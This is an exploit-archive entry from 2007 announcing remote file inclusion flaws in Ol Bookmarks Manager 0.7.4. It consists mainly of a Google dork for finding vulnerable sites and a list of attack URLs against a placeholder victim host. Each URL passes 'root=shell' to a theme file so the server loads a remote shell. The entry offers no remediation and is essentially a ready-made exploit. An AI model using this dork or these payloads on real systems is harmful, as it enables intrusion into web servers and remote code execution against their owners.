Ol Bookmarks Manager 0.7.4 (root) Remote File Inclusion Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Ol Bookmarks Manager 0.7.4 (root) Remote File Inclusion Vulnerabilities
# Published : 2007-05-21
# Author : ThE TiGeR
# Previous Title : Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit
# Next Title : TutorialCMS <= 1.01 Authentication Bypass Vulnerability

#Olbookmarks =>0.7.4 multiple RFI (root)

Download script :

#D0rk : allintitle:ol'bookmarks

#Thanks Str0ke

#Exploit : http://mesh.dl.sourceforge.net/sourceforge/olbookmarks/olbookmarks-0.7.4.tar.gz

#http://victime.com/olbookmarks-0.7.4/themes/test1.php?root=shell

#http://victime.com/path/themes/blackorange.php?root=shell

#http://victime.com/path/theme/default.php?root=shell

#http://victime.com/path/theme/frames1.php?root=shell

#http://victime.com/path/theme/frames1_top.php?root=shell

#http://victime.com/path/theme/test1.php?root=shell

#http://victime.com/path/theme/test2.php?root=shell

#http://victime.com/path/theme/test3.php?root=shell

#http://victime.com/path/theme/test4.php?root=shell

#http://victime.com/path/theme/test5.php?root=shell

#http://victime.com/path/theme/test6.php?root=shell

#http://victime.com/path/theme/frames1_left.php?root=shell

#http://victime.com/path/theme/frames1_center.php?root=shell

#Discovered by ThE TiGeR

#Miro_Tiger[at]Hotmail[dot]com

# www.Syue.com [2007-05-21]